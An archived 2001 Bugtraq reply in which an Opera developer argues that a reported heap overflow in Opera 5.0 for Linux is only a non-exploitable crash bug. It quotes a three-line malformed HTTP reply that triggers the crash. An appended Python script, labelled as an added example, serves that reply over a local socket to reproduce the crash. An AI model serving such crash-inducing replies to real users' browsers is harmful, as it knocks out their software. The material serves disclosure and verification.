6750411 2001-07-12 18:43 +0200  /33 lines/ Petter Reinholdtsen <pere@opera.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-16  07:49  by Brevbäraren
External recipient: comments@securiteam.com
External cc recipient: msarica@bilgiteks.com
External cc recipient: bugtraq@securifyfocus.com
Recipient: Bugtraq (import) <17967>
Subject: Re: Opera Browser Heap Overflow (Session Replay Attack)
------------------------------------------------------------
From: Petter Reinholdtsen <pere@opera.com>
To: comments@securiteam.com
Cc: msarica@bilgiteks.com, bugtraq@securifyfocus.com
Message-ID: <E15KjZ6-0006f5-00@zoot>


A few comments to
<URL:http://www.securiteam.com/securitynews/5MP0B004UW.html>.

The crash is _not_ an unchecked buffer error in Opera 5.12.  It is a
mismatched new/delete[] pair in Opera 5.0 for Linux (and not 5.12 for
windows).

Also, there is no need for long reply lines.  The following reply from
the server will also crash Opera:

  HTTP/1.0 200 OK\r\n
  Connection: X\r\n
  X

As far as I can tell, the received reply is not written into any short
buffer, and it is not possible to format the reply in any way to get
code executed.

There is no security problem, just a plain old crash bug. :-)

Please update the "vulnerability" page as soon as possible.

Copy to the reporter and bugtraq for information.
-- 
##>  Petter Reinholdtsen <##    | pere@opera.com
(6750411) /Petter Reinholdtsen <pere@opera.com>/----
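The three-line server reply quoted in the message above, served over a loopback socket so the reported crash can be checked against a browser build. This is an added example, not code from the mail, from Opera or from SecuriTeam; the listening address, the port, the client's GET request and the parameters on build_reply() are assumptions of the example. It only sends the bytes exactly as quoted (the final "X" with no trailing CRLF) and makes no claim about what any browser does with them.

```python
import socket
import threading

# The reply quoted in the mail: status line, one header, and a bare "X"
# with no CRLF after it. Everything else in this file (loopback address,
# port choice, the GET the client sends) is an assumption of the example.
CRASH_REPLY = b"HTTP/1.0 200 OK\r\nConnection: X\r\nX"


def build_reply(connection_value: str = "X", trailer: str = "X") -> bytes:
    """Build the reply; the defaults reproduce the mail's example exactly.

    The parameters are not from the page; they only let a tester vary the
    header value and the trailing line to see which part a browser
    actually reacts to."""
    return (b"HTTP/1.0 200 OK\r\n"
            + b"Connection: " + connection_value.encode("ascii") + b"\r\n"
            + trailer.encode("ascii"))


def serve_one(listener: socket.socket, reply: bytes) -> bytes:
    """Accept one connection on an already-listening socket, read the
    request head, send `reply`, close. Returns the request bytes read."""
    conn, _ = listener.accept()
    conn.settimeout(5.0)
    request = b""
    try:
        # Read until the end of the request head, or until the peer stops.
        while b"\r\n\r\n" not in request:
            chunk = conn.recv(4096)
            if not chunk:
                break
            request += chunk
        conn.sendall(reply)
    finally:
        conn.close()
    return request


def fetch(host: str, port: int, path: str = "/") -> bytes:
    """Minimal HTTP/1.0 client: send a GET, return the raw reply bytes
    until the server closes the connection."""
    with socket.create_connection((host, port), timeout=5.0) as s:
        s.sendall(f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii"))
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data


def loopback_demo(reply: bytes = CRASH_REPLY) -> tuple:
    """Run server and client in-process on 127.0.0.1 and return
    (request_seen_by_server, reply_seen_by_client)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    seen = []
    t = threading.Thread(target=lambda: seen.append(serve_one(listener, reply)))
    t.start()
    got = fetch("127.0.0.1", port)
    t.join()
    listener.close()
    return seen[0], got


def serve_forever(port: int = 8080, reply: bytes = CRASH_REPLY) -> None:
    """Serve the reply to every connection, so a real browser can be
    pointed at http://127.0.0.1:PORT/ (port is an assumed default).
    Stop with Ctrl-C."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", port))
    listener.listen(5)
    try:
        while True:
            serve_one(listener, reply)
    finally:
        listener.close()


if __name__ == "__main__":
    serve_forever()
```

Run the file and load http://127.0.0.1:8080/ in the browser under test; loopback_demo() exercises the same server/client exchange in-process and returns the bytes each side saw, which is enough to confirm that what goes on the wire is the quoted reply and nothing else.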